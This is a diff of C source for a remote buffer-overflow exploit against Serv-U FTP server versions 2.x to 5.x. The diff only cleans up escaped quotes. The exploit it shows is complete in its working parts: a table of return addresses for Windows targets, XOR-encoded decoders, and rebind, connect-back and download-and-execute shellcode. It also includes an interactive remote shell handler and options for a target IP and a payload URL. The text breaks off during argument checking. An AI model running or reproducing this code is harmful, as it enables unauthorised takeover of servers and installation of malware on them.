 *          : 2004-01-31 v5.0 Add msvcrt.dll jmp ebx addr, can use on CN/TW/EN/KR/other win2k SP4 if msvcrt.dll not changed.
-*          : 2004-01-26 v4.2 Change attack target, 2.x to \'>= 2.5i\' and \'<= 2.5h\'.
+*          : 2004-01-26 v4.2 Change attack target, 2.x to '>= 2.5i' and '<= 2.5h'.
 *          : 2004-01-22 v4.1 Change connectback shellcode in one, change bind shellcode to rebind shellcode.
 *          : 2004-01-13 v4.0 Can attack Serv-U 2.x.
-*          : 2004-01-11 v3.1 Add \"PORT\" command, can penetrate through the firewall. (shport > 1024)
+*          : 2004-01-11 v3.1 Add "PORT" command, can penetrate through the firewall. (shport > 1024)
 *          : 2004-01-09 v3.0 Put shellcode in file parameter, can attack Serv-U 4.1.0.12
 *          : 2004-01-08 v2.0 Add connectback shellcode.
 *          : 2004-01-07 v1.0 Can attack Serv-U v3.0.0.16 ~ v4.1.0.11
@@ -40,7 +40,7 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m
 *          :     cl Servu2.c
 *          :On UNIX
 *          :     gcc -o Servu2 Servu2.c -DUNIX
-* Usage       :e:\\>Servu2
+* Usage       :e:\>Servu2
 *          :Serv-U FTPD 2.x/3.x/4.x/5.x remote overflow exploit V7.0 (2004-01-07)
 *          :Bug find by bkbll (bkbll@cnhonker.net), Code by lion (lion@cnhonker.net)
 *          :Welcome to HUC website http://www.cnhonker.com
@@ -55,7 +55,7 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m
 *          :        -f      Port of the FTP Server        Default: 21
 *          :        -s      Port of the Shell             Default: 53
 *          :        -c      Connect back IP               For connectback shellcode
-*          :        -d      Download the URL and Exec     Start with \'http://\' or \'ftp://\'
+*          :        -d      Download the URL and Exec     Start with 'http://' or 'ftp://'
 *------------------------------------------------------------------------
 */
 
@@ -65,7 +65,7 @@ The problem exists due to insufficient bounds checking. Ultimately an attacker m
 #include <stdio.h>
 #include <stdlib.h>
 
-#pragma comment(lib, \"ws2_32\")
+#pragma comment(lib, "ws2_32")
 #else
 #define uint32_t DWORD
 #include <sys/types.h>
@@ -104,8 +104,8 @@ int WSAGetLastError()
 
 #define MAX_LEN            2048
 #define    SEH_OFFSET         48-1
-#define JMP_OVER        \"\\xeb\\x06\\xeb\\x06\"
-#define    VERSION            \"7.0\"
+#define JMP_OVER        "\xeb\x06\xeb\x06"
+#define    VERSION            "7.0"
 
 // for rebind shellcode
 #define BIND_OFFSET        113
@@ -118,11 +118,11 @@ int WSAGetLastError()
 #define SHELLPORT        53
 #define FTPPORT         21
 #define DEFTYPE         0
-#define DEFUSER            \"ftp\"
-#define DEFPASS            \"ftp@ftp.com\"
+#define DEFUSER            "ftp"
+#define DEFPASS            "ftp@ftp.com"
 
 // for Serv-U 2.x
-#define READ_ADDR        \"\\x01\\x01\\xfd\\x7f\"
+#define READ_ADDR        "\x01\x01\xfd\x7f"
 #define READ_OFFSET        5+14+12
 
 struct
@@ -131,145 +131,145 @@ struct
         char    *szDescription;
 }targets[] =
 {
-        {0x7801D07B,\"Serv-U 3.x/4.x/5.x  ALL   2K         SP3/SP4\"},    //msvcrt.dll pop,pop,ret addr
-//      {0x78010394,\"Serv-U 3.x/4.x/5.x  ALL   2K         SP4\"},                //msvcrt.dll pop,pop,ret addr
-        {0x77c22ca7,\"Serv-U 3.x/4.x/5.x  ALL   XP         SP1\"},                //msvcrt.dll pop,pop,ret addr
+        {0x7801D07B,"Serv-U 3.x/4.x/5.x  ALL   2K         SP3/SP4"},    //msvcrt.dll pop,pop,ret addr
+//      {0x78010394,"Serv-U 3.x/4.x/5.x  ALL   2K         SP4"},                //msvcrt.dll pop,pop,ret addr
+        {0x77c22ca7,"Serv-U 3.x/4.x/5.x  ALL   XP         SP1"},                //msvcrt.dll pop,pop,ret addr
 
-//      {0x7FFA1CB5,\"Serv-U 3.x/4.x/5.x  CN    2K/XP/2K3  ALL\"},                //pop,pop,ret addr for all CN win2000,winxp,win2003
-        {0x7ffa1571,\"Serv-U 3.x/4.x/5.x  CN    2K/XP/2K3  ALL\"},                //pop,pop,ret addr for all CN win2000,winxp,win2003
-        {0x7ffa1c1b,\"Serv-U 3.x/4.x/5.x  EN    2K/XP/2K3  ALL\"},                //pop,pop,ret addr for all EN win2000,winxp,win2003
-        {0x7ffae617,\"Serv-U 3.x/4.x/5.x  TW    2K/XP/2K3  ALL\"},                //pop,pop,ret addr for all TW win2000,winxp,win2003
-//      {0x7ffa2186,\"Serv-U 3.x/4.x/5.x  TW    2K         ALL\"},                //jmp ebx addr for all TW win2000
-        {0x7ffa4a1b,\"Serv-U 3.x/4.x/5.x  KR    2K         ALL\"},                //jmp ebx addr for all KR win2000
+//      {0x7FFA1CB5,"Serv-U 3.x/4.x/5.x  CN    2K/XP/2K3  ALL"},                //pop,pop,ret addr for all CN win2000,winxp,win2003
+        {0x7ffa1571,"Serv-U 3.x/4.x/5.x  CN    2K/XP/2K3  ALL"},                //pop,pop,ret addr for all CN win2000,winxp,win2003
+        {0x7ffa1c1b,"Serv-U 3.x/4.x/5.x  EN    2K/XP/2K3  ALL"},                //pop,pop,ret addr for all EN win2000,winxp,win2003
+        {0x7ffae617,"Serv-U 3.x/4.x/5.x  TW    2K/XP/2K3  ALL"},                //pop,pop,ret addr for all TW win2000,winxp,win2003
+//      {0x7ffa2186,"Serv-U 3.x/4.x/5.x  TW    2K         ALL"},                //jmp ebx addr for all TW win2000
+        {0x7ffa4a1b,"Serv-U 3.x/4.x/5.x  KR    2K         ALL"},                //jmp ebx addr for all KR win2000
 
-        {0x7ffa4512,\"Serv-U 2.x >= 2.5i  CN    2K/XP/2K3  ALL\"},                //jmp esp addr for all CN win2000,winxp,win2003
-        {0x7ffa4512,\"Serv-U 2.x <= 2.5h  CN    2K/XP/2K3  ALL\"},                //jmp esp addr for all CN win2000,winxp,win2003
-        {0x7ffa24ce,\"Serv-U 2.x >= 2.5i  TW    2K/XP/2K3  ALL\"},                //jmp esp addr for all TW win2000,winxp,win2003
-        {0x7ffa24ce,\"Serv-U 2.x <= 2.5h  TW    2K/XP/2K3  ALL\"},                //jmp esp addr for all TW win2000,winxp,win2003
+        {0x7ffa4512,"Serv-U 2.x >= 2.5i  CN    2K/XP/2K3  ALL"},                //jmp esp addr for all CN win2000,winxp,win2003
+        {0x7ffa4512,"Serv-U 2.x <= 2.5h  CN    2K/XP/2K3  ALL"},                //jmp esp addr for all CN win2000,winxp,win2003
+        {0x7ffa24ce,"Serv-U 2.x >= 2.5i  TW    2K/XP/2K3  ALL"},                //jmp esp addr for all TW win2000,winxp,win2003
+        {0x7ffa24ce,"Serv-U 2.x <= 2.5h  TW    2K/XP/2K3  ALL"},                //jmp esp addr for all TW win2000,winxp,win2003
 
-        {0x7ffa82a4,\"Serv-U 2.x >= 2.5i  KR    2K/XP/2K3  ALL\"},                //call esp addr for all KR win2000,winxp,win2003
-        {0x7ffa82a4,\"Serv-U 2.x <= 2.5h  KR    2K/XP/2K3  ALL\"},                //call esp addr for all KR win2000,winxp,win2003
-        {0x778e71a3,\"Serv-U 2.x >= 2.5i  EN    2K         SP4\"},                //setupapi.dll jmp esp addr
-        {0x778e71a3,\"Serv-U 2.x <= 2.5h  EN    2K         SP4\"},                //setupapi.dll jmp esp addr
+        {0x7ffa82a4,"Serv-U 2.x >= 2.5i  KR    2K/XP/2K3  ALL"},                //call esp addr for all KR win2000,winxp,win2003
+        {0x7ffa82a4,"Serv-U 2.x <= 2.5h  KR    2K/XP/2K3  ALL"},                //call esp addr for all KR win2000,winxp,win2003
+        {0x778e71a3,"Serv-U 2.x >= 2.5i  EN    2K         SP4"},                //setupapi.dll jmp esp addr
+        {0x778e71a3,"Serv-U 2.x <= 2.5h  EN    2K         SP4"},                //setupapi.dll jmp esp addr
 
-//      {0x7802ba77,\"Serv-U test\"},
+//      {0x7802ba77,"Serv-U test"},
 },v;
 
 
 unsigned char    *szSend[4];
 unsigned char    szCommand[MAX_LEN];
 
-// 28 bytes decode by lion for overwrite eip, don\'t change this.
+// 28 bytes decode by lion for overwrite eip, don't change this.
 unsigned char decode[]=
-\"\\xBE\\x6D\\x69\\x6F\\x6E\\x4E\\xBF\\x6D\\x69\\x30\\x6E\\x4F\\x43\\x39\\x3B\\x75\"
-\"\\xFB\\x4B\\x80\\x33\\x99\\x39\\x73\\xFC\\x75\\xF7\\xFF\\xD3\";
+"\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43\x39\x3B\x75"
+"\xFB\x4B\x80\x33\x99\x39\x73\xFC\x75\xF7\xFF\xD3";
 
-// 31 bytes decode by lion for overwrite SEH, don\'t change this.
+// 31 bytes decode by lion for overwrite SEH, don't change this.
 unsigned char decode2[]=
-\"\\x5E\\x5F\\x5B\\xBE\\x6D\\x69\\x6F\\x6E\\x4E\\xBF\\x6D\\x69\\x30\\x6E\\x4F\\x43\"
-\"\\x39\\x3B\\x75\\xFB\\x4B\\x80\\x33\\x99\\x39\\x73\\xFC\\x75\\xF7\\xFF\\xD3\";
+"\x5E\x5F\x5B\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43"
+"\x39\x3B\x75\xFB\x4B\x80\x33\x99\x39\x73\xFC\x75\xF7\xFF\xD3";
 
 
-// Shellcode start sign, use for decode, don\'t change this.
+// Shellcode start sign, use for decode, don't change this.
 unsigned char sc_start[]=
-\"lion\";
+"lion";
 
-// Shellcode end sign, use for decode, don\'t change this.
+// Shellcode end sign, use for decode, don't change this.
 unsigned char sc_end[]=
-\"li0n\";
+"li0n";
 
 // 344 bytes rebind shellcode by lion for Serv-U (xor with 0x99)
 unsigned char sc[]=
-\"\\x70\\xBB\\x98\\x99\\x99\\xC6\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\"
-\"\\xE9\\x85\\x34\\x12\\xF1\\x91\\x12\\x6E\\xF3\\x9D\\xC0\\x71\\x5B\\x99\\x99\\x99\"
-\"\\x7B\\x60\\xF1\\xAA\\xAB\\x99\\x99\\xF1\\xEE\\xEA\\xAB\\xC6\\xCD\\x66\\x8F\\x12\"
-\"\\x71\\xF3\\x9E\\xC0\\x71\\x30\\x99\\x99\\x99\\x7B\\x60\\x18\\x75\\x09\\x98\\x99\"
-\"\\x99\\xCD\\xF1\\x98\\x98\\x99\\x99\\x66\\xCF\\x89\\xC9\\xC9\\xC9\\xC9\\xF3\\x98\"
-\"\\xF3\\x9B\\x66\\xCF\\x8D\\x12\\x41\\x5E\\x9E\\x98\\x99\\x99\\x99\\xF3\\x9D\\x14\"
-\"\\x8E\\xCB\\xF3\\x9D\\xF1\\x66\\x66\\x99\\x99\\xCA\\x66\\xCF\\x81\\x5E\\x9E\\x9B\"
-\"\\x99\\x99\\xAC\\x10\\xDE\\x9D\\xF3\\x89\\xCE\\xCA\\x66\\xCF\\x85\\xF3\\x98\\xCA\"
-\"\\x66\\xCF\\xB9\\xC9\\xC9\\xCA\\x66\\xCF\\xBD\\x12\\x41\\xAA\\x59\\xF1\\xFA\\xF4\"
-\"\\xFD\\x99\\x10\\xFF\\xA9\\x1A\\x75\\xCD\\x12\\x65\\xF3\\x8D\\xC0\\x10\\x9D\\x16\"
-\"\\x7B\\x62\\x5F\\xDE\\x89\\xDD\\x67\\xDE\\xA5\\x67\\xDE\\xA4\\x10\\xC6\\xD1\\x10\"
-\"\\xC6\\xD5\\x10\\xC6\\xC9\\x14\\xDD\\xBD\\x89\\xCE\\xC9\\xC8\\xC8\\xC8\\xF3\\x98\"
-\"\\xC8\\xC8\\x66\\xEF\\xA9\\xC8\\x66\\xCF\\x9D\\x12\\x55\\xF3\\x66\\x66\\xA8\\x66\"
-\"\\xCF\\x91\\x72\\x9E\\x09\\x09\\x09\\x09\\x09\\x09\\x09\\xCA\\x66\\xCF\\xB1\\x66\"
-\"\\xCF\\x95\\xC8\\xCF\\x12\\xEC\\xA5\\x12\\xED\\xB7\\xE1\\x9A\\x6C\\xCF\\x12\\xEF\"
-\"\\xB9\\x9A\\x6C\\xAA\\x50\\xD0\\xD8\\x34\\x9A\\x5C\\xAA\\x42\\x96\\x27\\x89\\xA3\"
-\"\\x4F\\xED\\x91\\x58\\x52\\x94\\x9A\\x43\\xD9\\x72\\x68\\xA2\\x86\\xEC\\x7E\\xC7\"
-\"\\x12\\xC7\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC7\\x85\\x9A\\x44\\x12\\x9D\"
-\"\\x12\\x9A\\x5C\\x32\\xC7\\xC0\\x5A\\x71\\x40\\x67\\x66\\x66\\x17\\xD7\\x97\\x75\"
-\"\\xEB\\x67\\x2A\\x8F\\x34\\x40\\x9C\\x57\\xE7\\x41\\x7B\\xEA\\x52\\x74\\x65\\xA2\"
-\"\\x40\\x90\\x6C\\x34\\x75\\x6B\\xCC\\x59\\x3D\\x83\\xE9\\x5E\\x3D\\x34\\xB7\\x70\"
-\"\\x7C\\xD0\\x1F\\xD0\\x7E\\xE0\\x5F\\xE0\";
+"\x70\xBB\x98\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
+"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x5B\x99\x99\x99"
+"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
+"\x71\xF3\x9E\xC0\x71\x30\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
+"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xF3\x98"
+"\xF3\x9B\x66\xCF\x8D\x12\x41\x5E\x9E\x98\x99\x99\x99\xF3\x9D\x14"
+"\x8E\xCB\xF3\x9D\xF1\x66\x66\x99\x99\xCA\x66\xCF\x81\x5E\x9E\x9B"
+"\x99\x99\xAC\x10\xDE\x9D\xF3\x89\xCE\xCA\x66\xCF\x85\xF3\x98\xCA"
+"\x66\xCF\xB9\xC9\xC9\xCA\x66\xCF\xBD\x12\x41\xAA\x59\xF1\xFA\xF4"
+"\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x12\x65\xF3\x8D\xC0\x10\x9D\x16"
+"\x7B\x62\x5F\xDE\x89\xDD\x67\xDE\xA5\x67\xDE\xA4\x10\xC6\xD1\x10"
+"\xC6\xD5\x10\xC6\xC9\x14\xDD\xBD\x89\xCE\xC9\xC8\xC8\xC8\xF3\x98"
+"\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66"
+"\xCF\x91\x72\x9E\x09\x09\x09\x09\x09\x09\x09\xCA\x66\xCF\xB1\x66"
+"\xCF\x95\xC8\xCF\x12\xEC\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF\x12\xEF"
+"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
+"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC7"
+"\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A\x44\x12\x9D"
+"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x40\x67\x66\x66\x17\xD7\x97\x75"
+"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\xE7\x41\x7B\xEA\x52\x74\x65\xA2"
+"\x40\x90\x6C\x34\x75\x6B\xCC\x59\x3D\x83\xE9\x5E\x3D\x34\xB7\x70"
+"\x7C\xD0\x1F\xD0\x7E\xE0\x5F\xE0";
 
 // 304 bytes connectback shellcode by lion for Serv-U (xor with 0x99)
 unsigned char cbsc[]=
-\"\\x70\\x9C\\x98\\x99\\x99\\xC6\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\"
-\"\\xE9\\x85\\x34\\x12\\xF1\\x91\\x12\\x6E\\xF3\\x9D\\xC0\\x71\\x05\\x99\\x99\\x99\"
-\"\\x7B\\x60\\xF1\\xAA\\xAB\\x99\\x99\\xF1\\xEE\\xEA\\xAB\\xC6\\xCD\\x66\\x8F\\x12\"
-\"\\x71\\xF3\\x9D\\xC0\\x71\\x1A\\x99\\x99\\x99\\x7B\\x60\\x18\\x75\\x09\\x98\\x99\"
-\"\\x99\\xCD\\xF1\\x98\\x98\\x99\\x99\\x66\\xCF\\x89\\xC9\\xC9\\xC9\\xC9\\xF3\\x98\"
-\"\\xF3\\x9B\\x66\\xCF\\x8D\\x12\\x41\\xF1\\xE6\\x99\\x99\\x98\\xF1\\x9B\\x99\\x99\"
-\"\\xAC\\x12\\x55\\xF3\\x89\\xC8\\xCA\\x66\\xCF\\x81\\x1C\\x59\\xEC\\xD2\\xAA\\x59\"
-\"\\xF1\\xFA\\xF4\\xFD\\x99\\x10\\xFF\\xA9\\x1A\\x75\\xCD\\x12\\x65\\xF3\\x89\\xC0\"
-\"\\x10\\x9D\\x16\\x7B\\x62\\x5F\\xDE\\x89\\xDD\\x67\\xDE\\xA5\\x67\\xDE\\xA4\\x10\"
-\"\\xC6\\xD1\\x10\\xC6\\xD5\\x10\\xC6\\xC9\\x14\\xDD\\xBD\\x89\\xCE\\xC9\\xC8\\xC8\"
-\"\\xC8\\xF3\\x98\\xC8\\xC8\\x66\\xEF\\xA9\\xC8\\x66\\xCF\\x9D\\x12\\x55\\xF3\\x66\"
-\"\\x66\\xA8\\x66\\xCF\\x91\\xCA\\x66\\xCF\\x85\\x66\\xCF\\x95\\xC8\\xCF\\x12\\xEC\"
-\"\\xA5\\x12\\xED\\xB7\\xE1\\x9A\\x6C\\xCF\\x12\\xEF\\xB9\\x9A\\x6C\\x72\\x9E\\x09\"
-\"\\x09\\x09\\x09\\x09\\x09\\x09\\xAA\\x50\\xD0\\xD8\\x34\\x9A\\x5C\\xAA\\x42\\x96\"
-\"\\x27\\x89\\xA3\\x4F\\xED\\x91\\x58\\x52\\x94\\x9A\\x43\\xD9\\x72\\x68\\xA2\\x86\"
-\"\\xEC\\x7E\\xC7\\x12\\xC7\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC7\\x85\\x9A\"
-\"\\x44\\x12\\x9D\\x12\\x9A\\x5C\\x32\\xC7\\xC0\\x5A\\x71\\x6F\\x67\\x66\\x66\\x17\"
-\"\\xD7\\x97\\x75\\xEB\\x67\\x2A\\x8F\\x34\\x40\\x9C\\x57\\xE7\\x41\\x7B\\xEA\\x52\"
-\"\\x74\\x65\\xA2\\x40\\x90\\x6C\\x34\\x75\\x60\\x33\\xF9\\x7E\\xE0\\x5F\\xE0\\x99\";
+"\x70\x9C\x98\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
+"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x05\x99\x99\x99"
+"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
+"\x71\xF3\x9D\xC0\x71\x1A\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
+"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xF3\x98"
+"\xF3\x9B\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x99"
+"\xAC\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD2\xAA\x59"
+"\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x12\x65\xF3\x89\xC0"
+"\x10\x9D\x16\x7B\x62\x5F\xDE\x89\xDD\x67\xDE\xA5\x67\xDE\xA4\x10"
+"\xC6\xD1\x10\xC6\xD5\x10\xC6\xC9\x14\xDD\xBD\x89\xCE\xC9\xC8\xC8"
+"\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66"
+"\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xEC"
+"\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF\x12\xEF\xB9\x9A\x6C\x72\x9E\x09"
+"\x09\x09\x09\x09\x09\x09\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96"
+"\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86"
+"\xEC\x7E\xC7\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A"
+"\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x6F\x67\x66\x66\x17"
+"\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C\x57\xE7\x41\x7B\xEA\x52"
+"\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0\x99";
 
 // 194 bytes download url file and exec shellcode by lion (xor with 0x99)
 // Tested on Serv-U 3.x/4.x/5.x
 unsigned char dusc[]=
-\"\\x70\\x3D\\x99\\x99\\x99\\xC6\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\"
-\"\\xE9\\x85\\x34\\x12\\xF1\\x91\\x12\\x6E\\xF3\\x9D\\xC0\\x71\\xDD\\x99\\x99\\x99\"
-\"\\x7B\\x60\\xF1\\xF6\\xF7\\x99\\x99\\xF1\\xEC\\xEB\\xF5\\xF4\\xCD\\x66\\x8F\\x12\"
-\"\\x71\\x71\\xB7\\x99\\x99\\x99\\x1A\\x75\\xB9\\x12\\x45\\xF3\\xB9\\xCA\\x66\\xCF\"
-\"\\x9D\\x5E\\x9D\\x9A\\xC5\\xF8\\xB7\\xFC\\x5E\\xDD\\x9A\\x9D\\xE1\\xFC\\x99\\x99\"
-\"\\xAA\\x59\\xC9\\xC9\\xCA\\xCE\\xC9\\x66\\xCF\\x89\\x12\\x45\\xC9\\xCA\\x66\\xCF\"
-\"\\x91\\x66\\xCF\\x95\\xC8\\xCF\\x12\\xEC\\xA5\\x12\\xED\\xB7\\xE1\\x9A\\x6C\\xCF\"
-\"\\x12\\xEF\\xB9\\x9A\\x6C\\xAA\\x50\\xD0\\xD8\\x34\\x9A\\x5C\\xAA\\x42\\x96\\x27\"
-\"\\x89\\xA3\\x4F\\xED\\x91\\x58\\x52\\x94\\x9A\\x43\\xD9\\x72\\x68\\xA2\\x86\\xEC\"
-\"\\x7E\\xC7\\x12\\xC7\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC7\\x85\\x9A\\x44\"
-\"\\x12\\x9D\\x12\\x9A\\x5C\\x32\\xC7\\xC0\\x5A\\x71\\xCE\\x66\\x66\\x66\\x17\\xD7\"
-\"\\x97\\x75\\x58\\xE0\\x7C\\x21\\x01\\x67\\x13\\x97\\xE7\\x41\\x7B\\xEA\\xAF\\x83\"
-\"\\xB6\\xE9\";
+"\x70\x3D\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
+"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\xDD\x99\x99\x99"
+"\x7B\x60\xF1\xF6\xF7\x99\x99\xF1\xEC\xEB\xF5\xF4\xCD\x66\x8F\x12"
+"\x71\x71\xB7\x99\x99\x99\x1A\x75\xB9\x12\x45\xF3\xB9\xCA\x66\xCF"
+"\x9D\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD\x9A\x9D\xE1\xFC\x99\x99"
+"\xAA\x59\xC9\xC9\xCA\xCE\xC9\x66\xCF\x89\x12\x45\xC9\xCA\x66\xCF"
+"\x91\x66\xCF\x95\xC8\xCF\x12\xEC\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF"
+"\x12\xEF\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27"
+"\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC"
+"\x7E\xC7\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A\x44"
+"\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\xCE\x66\x66\x66\x17\xD7"
+"\x97\x75\x58\xE0\x7C\x21\x01\x67\x13\x97\xE7\x41\x7B\xEA\xAF\x83"
+"\xB6\xE9";
 
 // exec file url addr for download url file and exec shellcode
-unsigned char downloadurl[255]= \"\";
+unsigned char downloadurl[255]= "";
 
 
 void showtype()
 {
     int i;
 //    usage(p);
-    printf( \"[Type]:\\n\");
+    printf( "[Type]:\n");
     for(i=0;i<sizeof(targets)/sizeof(v);i++)
     {
-        printf(\"\\t%d\\t0x%x\\t%s\\n\", i, targets[i].dwJMP, targets[i].szDescription);
+        printf("\t%d\t0x%x\t%s\n", i, targets[i].dwJMP, targets[i].szDescription);
     }
 }
 
 void usage(char *p)
 {
-    printf( \"Usage:\\t%s\\t-i <ip> [Options]\\n\"
-        \"\\t\\t-t\\tShow All Target Type.\\n\\n\"
-        \"[Options:]\\n\"
-        \"\\t-i\\tTarget IP                     Required\\n\"
-        \"\\t-t\\tTarget Type                   Default: %d\\n\"
-        \"\\t-u\\tFTP Username                  Default: %s\\n\"
-        \"\\t-p\\tFTP Password                  Default: %s\\n\"
-        \"\\t-f\\tPort of the FTP Server        Default: %d\\n\"
-        \"\\t-s\\tPort of the Shell             Default: %d\\n\"
-        \"\\t-c\\tConnect back IP               For connectback shellcode\\n\"
-        \"\\t-d\\tDownload the URL and Exec     Start with \'http://\' or \'ftp://\'\\n\\n\"
+    printf( "Usage:\t%s\t-i <ip> [Options]\n"
+        "\t\t-t\tShow All Target Type.\n\n"
+        "[Options:]\n"
+        "\t-i\tTarget IP                     Required\n"
+        "\t-t\tTarget Type                   Default: %d\n"
+        "\t-u\tFTP Username                  Default: %s\n"
+        "\t-p\tFTP Password                  Default: %s\n"
+        "\t-f\tPort of the FTP Server        Default: %d\n"
+        "\t-s\tPort of the Shell             Default: %d\n"
+        "\t-c\tConnect back IP               For connectback shellcode\n"
+        "\t-d\tDownload the URL and Exec     Start with 'http://' or 'ftp://'\n\n"
         , p, DEFTYPE, DEFUSER, DEFPASS, FTPPORT, SHELLPORT);    
 
     //showtype();
@@ -297,13 +297,13 @@ void shell (int sock)
             l = recv (sock, buf, sizeof (buf), 0);
             if (l <= 0)
             {
-                printf (\"[-] Connection closed.\\n\");
+                printf ("[-] Connection closed.\n");
                 return;
             }
             l = write (1, buf, l);
             if (l <= 0)
             {
-                printf (\"[-] Connection closed.\\n\");
+                printf ("[-] Connection closed.\n");
                 return;
             }
         }
@@ -312,13 +312,13 @@ void shell (int sock)
             l = read (0, buf, sizeof (buf));
             if (l <= 0)
             {
-                printf(\"[-] Connection closed.\\n\");
+                printf("[-] Connection closed.\n");
                 return;
             }
             l = send(sock, buf, l, 0);
             if (l <= 0)
             {
-                printf(\"[-] Connection closed.\\n\");
+                printf("[-] Connection closed.\n");
                 return;
             }
         }
@@ -344,9 +344,9 @@ int main(int argc, char **argv)
     unsigned int    timeout=5000, Reuse;
     char    penetrate[255],cbHost2[20];
     
-    printf( \"Serv-U FTPD 2.x/3.x/4.x/5.x remote overflow exploit V%s (2004-01-07)\\r\\n\"
-        \"Bug find by bkbll (bkbll@cnhonker.net), Code by lion (lion@cnhonker.net)\\r\\n\"
-        \"Welcome to HUC website http://www.cnhonker.com\\r\\n\\n\"
+    printf( "Serv-U FTPD 2.x/3.x/4.x/5.x remote overflow exploit V%s (2004-01-07)\r\n"
+        "Bug find by bkbll (bkbll@cnhonker.net), Code by lion (lion@cnhonker.net)\r\n"
+        "Welcome to HUC website http://www.cnhonker.com\r\n\n"
              , VERSION);
 
     if(argc < 2)
@@ -354,7 +354,7 @@ int main(int argc, char **argv)
         usage(argv[0]);
         return 1;
     }
-    else if(argc == 2 && argv[1][1] == \'t\')
+    else if(argc == 2 && argv[1][1] == 't')
     {
         showtype();
         return 1;
@@ -375,29 +375,29 @@ int main(int argc, char **argv)
         }
         switch(argv[i][1])
         {
-            case \'i\':
+            case 'i':
                 ip=argv[i+1];
                 break;
-            case \'t\':
+            case 't':
                 iType = atoi(argv[i+1]);
                 break;
-            case \'f\':
+            case 'f':
                 iPort=atoi(argv[i+1]);
                 break;
-            case \'p\':
+            case 'p':
                 pPass = argv[i+1];
                 break;
-            case \'u\':
+            case 'u':
                 pUser=argv[i+1];
                 break;
-            case \'s\':
+            case 's':
                 shport=atoi(argv[i+1]);
                 break;
-            case \'c\':
+            case 'c':
                 cbHost=argv[i+1];
                 bCb=TRUE;
                 break;
-            case \'d\':
+            case 'd':
                 url = argv[i+1];
                 bUrl=TRUE;
                 break;
@@ -408,48 +408,48 @@ int main(int argc, char **argv)
     if((!ip) || (!user) || (!pass))
     {
         usage(argv[0]);
-        printf(\"[-] Invalid parameter.\\n\");
+        printf("[-] Invalid parameter.\n");
         return -1;
     }
 
     if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
     {
         usage(argv[0]);
-        printf(\"[-] Invalid type.\\n\");
+        printf("[-] Invalid type.\n");
         return -1;
     }
 
     if(iPort <1 || iPort >65535 || shport <1 || shport > 65535)
     {
         usage(argv[0]);
-        printf(\"[-] Invalid port.\\n\");
+        printf("[-] Invalid port.\n");
         return -1;
     }
 
     if(bUrl)
     {
-        if( (!strstr(url, \"http://\") &&  !strstr(url, \"ftp://\")) || strlen(url) < 10 || strlen(url) > 255)
+        if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 255)
         {
             usage(argv[0]);
